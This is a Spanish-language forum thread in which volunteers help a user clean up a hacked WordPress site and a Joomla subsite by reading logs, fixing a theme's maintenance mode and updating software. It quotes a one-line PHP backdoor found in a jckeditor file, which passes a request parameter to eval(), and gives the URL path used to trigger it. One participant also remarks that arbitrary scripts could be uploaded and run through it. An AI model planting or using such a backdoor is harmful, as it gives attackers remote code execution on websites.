am Haz un grep red.php?mode=setconfig o grep red.php?mode=config, a ver si hay entradas recientes alrededor de ahí. Todavia no puedo ver la pagina, me sale en blanco :/. Si, me esta devolviendo un error 500. Borré el cache y todo de Firefox y la sigo viendo bien ahí pero en IE me sale error 500 y no se puede ver!!. Con respecto al comando que me has dicho, lo siento Minus, pero no tengo idea donde ingresar eso para verificar lo que me dices. Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 03:04 am @MinusFour busque red.php pero no encontre nada en el access...
Lo que si he visto, unas cuantas entradas de IP's que se aprovecharon del mailer (wp-query.php) Código: 213.229.124.7 - - [08/Jul/2014:19:53:12 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0" Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:08 am @MinusFour busque red.php pero no encontre nada en el access... Lo que si he visto, unas cuantas entradas de IP's que se aprovecharon del mailer (wp-query.php) Código: 213.229.124.7 - - [08/Jul/2014:19:53:12 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0" Saludos #!drvy vos ves la web correctamente? Ahora tanto en Firefox como en IE veo todo en BLANCO. Parece que ahora si mi navegador borro todo y veo lo que dice MinusFour que no la puede ver. O tu has tocado otra cosa? Avisame si la ves bien porque yo no la veo xDDD. Es el puto .htaccess que está jodiendo? Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 03:14 am La página sigue tirando el mismo errror: Status Code:500 Internal Server Error. Es extraño que no haya entradas de red.php... ¿de que otra manera se ejecutaría el código? ¿Lo mandan a llamar desde otro archivo?
Edit: Ya no me tira error 500. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:16 am La página sigue tirando el mismo errror: Status Code:500 Internal Server Error. Es extraño que no haya entradas de red.php... ¿de que otra manera se ejecutaría el código? ¿Lo mandan a llamar desde otro archivo? Algo extraño pasa acá. Hace un rato en Firefox veía en blanco y en IE me aparece ERROR 500. Y ahora en Firefox nuevamente veo la web perfectamente, pero en IE veo el "ESTAMOS RENOVANDO". No se que está sucediendo... quizás sea #!drvy tocando cosas, intentando reparar esto o no lo sé. Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 03:23 am LOL me acaba de dar cuenta que la pagina que dice que estamos renovando es un error 500 también... XD Solo que personalizado.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:25 am LOL me acaba de dar cuenta que la pagina que dice que estamos renovando es un error 500 también... XD Solo que personalizado. Eso se quita desde el .htaccess MinusFour?? Sigo esperando instrucciones, no se como proceder :P. #!drvy se debe haber ido a dormir xD Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 03:30 am EY ! Estoy aquí xDD estoy buscando al culpable del error 500.. Mientras tanto..
Encontre al culpable del juankeo.. http://paste.debian.net/plain/111546 Es posible que tengas una vulnerabilidad en Código: http://wilboradalibros.com.ar/peritajedearte/ Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 03:36 am EY ! Estoy aquí xDD estoy buscando al culpable del error 500.. Mientras tanto.. Encontre al culpable del juankeo.. http://paste.debian.net/plain/111546 Es posible que tengas una vulnerabilidad en Código: http://wilboradalibros.com.ar/peritajedearte/ Saludos Esas entradas parece que son de un Joomla. ¿Seguro que de ahí viene el juank? Eso se quita desde el .htaccess MinusFour?? Sigo esperando instrucciones, no se como proceder :P. #!drvy se debe haber ido a dormir xD ¿Hay algún archivo .maintenance en tu directorio de wordpress? ¿Dices que los plugins estan desactivados? Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 03:38 am Ya lo mire no tiene ninguno. Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona.
Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:41 am EY ! Estoy aquí xDD estoy buscando al culpable del error 500.. Mientras tanto.. Encontre al culpable del juankeo.. http://paste.debian.net/plain/111546 Es posible que tengas una vulnerabilidad en Código: http://wilboradalibros.com.ar/peritajedearte/ Saludos SON UNOS GENIOS, me gustaría saber en que parte ponen esos comandos para la próxima vez yo saberlos hacer. Tanto los comandos que has puesto tu ahí como los que me ha dicho MinusFour antes. No sabía donde ingresarlos. Con respecto a la vulnerabilidad, hay alguna forma de poder parchar eso? Siento que este post se hace infinito, No quiero molestarlos más, pero de una cosa lleva a la otra. Lo siento amigos!! Sigo aqui a la espera del error 500 #!drvy lo que necesites estoy por acá esperando y leyendo. Gracias MinusFour nuevamente! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 03:46 am Ya lo mire no tiene ninguno. Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona. Saludos ¿Quizás sea porque el tema no está actualizado para la 3.9.1? Ka0s dijo que actualizo de versión de wordpress recientemente, quizás necesite ajustes el tema. Y si tiene plugins viejos también habria que revisarlos si funcionan con la nueva versión. Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 03:50 am He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto:
Código: [Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519. Raro xD Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:54 am He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto: Código: [Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519. Raro xD Saludos #!drvy Ella me ha comentado que trabaja o trabajaba con un programador y tambien los que le han dicho al principio de que tenía un virus fue gente del servidor. No pueden ser la IP de ellos? O lo que se ve ahí en el log son "ataques precisos"?? Con respecto a la web, si la he actualizado a la 3.9.1 y el template o tema, no esta adaptado para esa versión, significa que jodimos la web no?? Quiero ayudarlos pero no sé como... Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 04:01 am Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa...
Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento. Ahora toca mirar la vulnerabilidad esa.. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 04:05 am Entonces si era cosa del tema :P
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 04:05 am Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa... Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento. Ahora toca mirar la vulnerabilidad esa.. Saludos Estoy que casi me pongo a llorar de la emoción. Ahora si la visualizo perfectamente. Muchas gracias #!drvy y tambien a ti MinusFour, lo he dicho mil veces pero igual, GRACIAS GRACIAS Y GRACIAS!!. Con respecto a la web esa de peritajedearte, está hecho en Joomla como ha dicho MinusFour creo, al menos el favicon aparece con el logo. Quizás este desactualizado también o no sé. Estás seguro que hay un agujero ahí?? Avisenme si necesitan algo!! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 04:24 am Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.
EDIT: Parece que si puedes hacer XSS por medio del primero, cuarto y quinto link. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 04:27 am Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo. Veremos que dice #!drvy de eso. Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-. Ojala podamos encontrar la vulnerabilidad que han dicho arriba Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 04:32 am Veremos que dice #!drvy de eso. Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-. Ojala podamos encontrar la vulnerabilidad que han dicho arriba Seria muy facil subir un script ahi por medio de fopen() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 04:36 am Seria muy facil subir un script ahi por medio de file_get_contents() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD. Trato de intentar entender lo que dices, pero se me complica mucho. Como puedo corregir eso de la variable que dices?? En que archivo se encuentra? Gracias Minus Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 04:40 am Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.
Lo que si he podido aislar es el ataque.. Código: 176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02" El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces. Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD Estoy mirando el archivo ese de joomla. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 04:41 am Trato de intentar entender lo que dices, pero se me complica mucho. Como puedo corregir eso de la variable que dices?? En que archivo se encuentra? Gracias Minus No se de que archivo, solo se que le estan pasando una variable GET y no están escapando los caracteres especiales, por lo que el código se ejecuta. Realmente lo único que he probado es: echo $_SERVER["SERVER_NAME"] para lo cual me trae: Código: www.wilboradalibros.com.ar Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 04:44 am En el archivo litermalmente pone esto:
Código: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura.. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 04:49 am En el archivo litermalmente pone esto: Código: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. Saludos #!drvy con esto quieres que decir que está TODO SOLUCIONADO? Me podrías decir qué linea era y de que archivo por favor así miro la línea que has comentado. Me gustaría saber que línea habia antes y compararla con la que has puesto ahora. Despues de semejante post y horas aquí, quiero seguir aprendiendo un poco. Yo estaba tratando de acceder al Administrador de Joomla, pero no me ha pasado los datos de esa parte, solo la de Wordpress ¬¬ y quería ver que versión tenía instalada. Porque pensé que si la Wordpress tenia la versión vieja, seguramente la de Joomla también y eso repararía el error no creen? Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 04:50 am Si se me olvido mencionarlo..
El archivo esta en peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php La linea uno contenía lo que puse en el post de arriba, y ahora tiene Código
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 04:54 am ¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.
Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 04:59 am Si se me olvido mencionarlo.. El archivo esta en peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php La linea uno contenía lo que puse en el post de arriba, y ahora tiene Código
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD Saludos MUCHAS GRACIAS POR LA ACLARACIÓN Y POR TODO. Como dijo MinusFour, espero que esa línea no la utilicen para nada no? ¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así. Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada. Del mismo archivo dices o de cual? Debo comentarlas tambien como hizo arriba !#drvy?? Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 05:00 am @MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..
Código: /peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req= Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 05:04 am @MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea.. Código: /peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req= Saludos Uff, que mal. Tienes razón con que es un nido de malware esto!! Debo comentarlas como has hecho tu o lo estás modificando vos? Como tienes el acceso no se si solo lo ves, o lo estás modificando jajaj. Avisame asi si no lo modificas tu, lo hago yo. Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar... Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 05:06 am Citar Debo comentarlas como has hecho tu o lo estás modificando vos? He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD Citar Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar... Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido. PD: @MinusFour, si quieres te paso el access-log ? Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 05:10 am He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido. PD: @MinusFour, si quieres te paso el access-log ? Saludos ¿Crees que haya más backdoors por ahi? Si quieres le doy un vistazo. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 05:20 am He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido. PD: @MinusFour, si quieres te paso el access-log ? Saludos Y bueno entonces si ya está todo al parecer? Creo que debería estar todo OK y sin problemas, espero que por un buen tiempo Que no venga MinusFour a decir unas líneas más jajajaja. He actualizado el Joomla de peritaje de arte a la versión 3.3.2 (La última que me recomendaba!!!) Si hemos terminado aqui, quiero darle las gracias por todo su tiempo, esfuerzo y dedicación para un "desconocido" como yo. Tanto a ti como a MinusFour, sin duda, valoro muchísimo su tiempo y les agradezco de corazón la ayuda prestada!!! Si estarían por aqui los invitaría una cerveza a cada uno xDD. Bueno espero que hayamos terminado, Y MIL GRACIAS!! Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 05:32 am En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos".
Dile a tu amiga que te lo pague bien xD (http://img.mogicons.com/l/if-you-know-what-i-mean-127.png) Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 07:46 am Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 16:37 pm Parece ser que el 4 de julio le hicieron un ataque de fuerza bruta a la pagina de login de wordpress. Un ataque de mas de 9000 intentos en dos horas... pero no estoy seguro si consiguieron la password o no. Por lo que veo cuando el usuario se loguea lo redirecionan a wp-admin y nunca paso esto, pero a saber si el programita sigue los headers del HTTP. Y bueno, esto es una lotería igual. Con todo lo que tocamos ayer, espero que haya "tapado" al menos por un tiempo. El Wordpress y el Joomla están actualizados. #!drvy pudo limpiar los virus y creo que estaría todo "OK". O que más aconsejan? Moverle el login a otra parte? o algo así? Los sigo escuchando muchachos. GRACIAS! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 17:15 pm Lo único que recomiendo es que los admins y usuarios con permisos tengan passwords únicas y seguras. De las urls de joomla no pude encontrar nada más, las examine todas porque eran pocas y fuera de esas entradas raras no encontre nada.
De wordpress muchas llamadas a un archivo systemcash.php y me parece que dijo #!drvy que lo habían borrado. Puede ser que el archivo haya sido subido por FTP pero obviamente esto no aparecera en el log de apache. Esto lo he visto en otro foro, posts desde hace un mes: Citar We recently saw this exact named file show up on a few wordpress sites. In every case it was uploaded via FTP login. http://www.webhostingtalk.com/showthread.php?t=1387485 Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 17:28 pm Lo único que recomiendo es que los admins y usuarios con permisos tengan passwords únicas y seguras. De las urls de joomla no pude encontrar nada más, las examine todas porque eran pocas y fuera de esas entradas raras no encontre nada. De wordpress muchas llamadas a un archivo systemcash.php y me parece que dijo #!drvy que lo habían borrado. Puede ser que el archivo haya sido subido por FTP pero obviamente esto no aparecera en el log de apache. Esto lo he visto en otro foro, posts desde hace un mes: http://www.webhostingtalk.com/showthread.php?t=1387485 Ah ok. Gracias. Justo hoy entro al Joomla y pide actualizarse otra vez a la versión 3.3.3 cuando ayer la he actualizado a la 3.3.2 me pareció muy raro no?. Lo peor de todo es que no me deja actualizar ahora me arroja: ERROR: The archive file is corrupt, truncated or archive parts are missing Joomla 3.3.3. Voy a esperar un poco más haber si se repara, o sino trataré de actualizarlo manualmente y no de forma automática como probé ahora (aunque de esta forma NUNCA tuve problemas) Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 19:09 pm Ahora que está todo OK supuestamente.
Conviene que borre los ERROR LOGS y que se genere nuevamente un archivo de 0 no? Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 19:18 pm Ahora que está todo OK supuestamente. Conviene que borre los ERROR LOGS y que se genere nuevamente un archivo de 0 no? Yo diría que puedes borrarlo, guarda los logs en algún lado y borralos. Apache debería crearlos de nuevo (si es un customlog). Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 19:23 pm Yo diría que puedes borrarlo, guarda los logs en algún lado y borralos. Apache debería crearlos de nuevo (si es un customlog). Gracias!! Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 19:31 pm Citar (si es un customlog). Yo creo que es un link, porque cuando estuve en el FTP, le cambie el nombre para ver si generaba mas errores y no tener que descargar los 30MB.. y seguía rellenando el mismo archivo aunque tuviese nombre distinto xD Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 19:58 pm Yo creo que es un link, porque cuando estuve en el FTP, le cambie el nombre para ver si generaba mas errores y no tener que descargar los 30MB.. y seguía rellenando el mismo archivo aunque tuviese nombre distinto xD Saludos Uh, entonces no debería borrar los log! A menos que haya una herramienta en el panel para rehacer el link. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 22:34 pm Uh, entonces no debería borrar los log! A menos que haya una herramienta en el panel para rehacer el link. Tranquilo, no llegué a borrarlo todavía. Entonces mejor no toco nada y lo dejamos ahí. Gracias #!drvy y MinusFour |